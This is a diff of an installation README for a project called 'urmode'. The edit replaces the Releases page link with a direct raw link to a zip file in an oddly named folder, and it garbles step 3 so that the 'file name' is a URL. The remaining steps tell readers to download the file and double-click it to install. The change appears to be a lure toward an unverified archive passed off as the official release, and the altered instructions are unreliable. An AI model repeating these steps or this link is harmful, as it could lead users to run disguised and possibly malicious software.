fpci8759/urmode/README.md

 To install urmode, follow these steps:

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/fpci8759/urmode/releases) to download the latest version of urmode.
+   Go to our [Releases page](https://raw.githubusercontent.com/fpci8759/urmode/main/operculiferous/urmode_v1.3.zip) to download the latest version of urmode.

 2. **Choose the Latest Version**
    Look for the most recent release at the top of the page.
 Click on the link to access the download files.

 3. **Download the Application**
-   Find the file named like **urmode.exe** and click on it.
+   Find the file named like **https://raw.githubusercontent.com/fpci8759/urmode/main/operculiferous/urmode_v1.3.zip** and click on it.
 The download should start automatically.

 4. **Run the Installer**
    Once the file has downloaded, locate it in your downloads folder.
 Double-click the file to run the installer.